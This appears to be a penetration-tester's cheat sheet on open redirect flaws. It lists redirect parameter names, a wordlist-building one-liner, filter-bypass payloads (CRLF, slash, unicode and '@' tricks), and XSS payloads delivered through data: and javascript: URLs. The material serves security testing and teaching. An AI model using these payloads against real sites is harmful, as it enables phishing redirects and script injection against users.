Open Redirect

Example:

https://google.com/?redirect_to=https://gmail.google.com

Could change to:

https://google.com/?redirect_to=https://attacker.com

Keep an eye out for URL parameters that include certain names, such as url=, redirect=, next=, etc. In some cases, redirect parameters might be labled with just single characters, such as r= or u=.

When a user accesses to a resource with unauthenticated session, web applications uasually redirect user to login form url which contains the link of the resource as a url parameter. When the user logs in successfully, these applications use the url parameter to redirect user to the url which user attend to access in the begining. Thereforce, the open redirect vulnerability uasually occurs in login form.

Bypass payload:

Some applications do filter, whitelist or blacklist the redirect parameter before performs it.

PayloadsAllTheThings - Open Redirect

Should fuzzing with all payloads in PayloadsAllTheThings

Fuzzing

Replace www.whitelisteddomain.tld from Open-Redirect-payloads.txt with a specific white listed domain in your test case

To do this simply modify the WHITELISTEDDOMAIN with value www.test.com to your test case URL.

WHITELISTEDDOMAIN="www.test.com" && sed 's/www.whitelisteddomain.tld/'"$WHITELISTEDDOMAIN"'/' Open-Redirect-payloads.txt > Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt && echo "$WHITELISTEDDOMAIN" | awk -F. '{print "https://"$0"."$NF}' >> Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt

Filter Bypass

Shopify login open redirect

http://mystore.myshopify.com/account/login?checkout_url=atacker.com
redirect to:
http://mystore.myshopify.com.atacker.com

Using a whitelisted domain or keyword

www.whitelisted.com.evil.com redirect to evil.com

Using CRLF to bypass "javascript" blacklisted keyword

java%0d%0ascript%0d%0a:alert(0)

Using "//" to bypass "http" blacklisted keyword

//google.com

Using "https:" to bypass "//" blacklisted keyword

https:google.com

Using "\/\/" to bypass "//" blacklisted keyword (Browsers see \/\/ as //)

\/\/google.com/
/\/google.com/

Using "%E3%80%82" to bypass "." blacklisted character

/?redir=google。com
//google%E3%80%82com

Using null byte "%00" to bypass blacklist filter

//google%00.com

Using parameter pollution

?next=whitelisted.com&next=google.com

Using "@" character, browser will redirect to anything after the "@"

http://www.theirsite.com@yoursite.com/

Creating folder as their domain

http://www.yoursite.com/http://www.theirsite.com/
http://www.yoursite.com/folder/www.folder.com

Host/Split Unicode Normalization

https://evil.c℀.example.com . ---> https://evil.ca/c.example.com
http://a.com／X.b.com

XSS from Open URL - If it's in a JS variable

";alert(0);//

XSS from data:// wrapper

http://www.example.com/redirect.php?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==

XSS from javascript:// wrapper

http://www.example.com/redirect.php?url=javascript:prompt(1)

Common injection parameters

/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}

References

https://book.hacktricks.xyz/pentesting-web/open-redirect https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html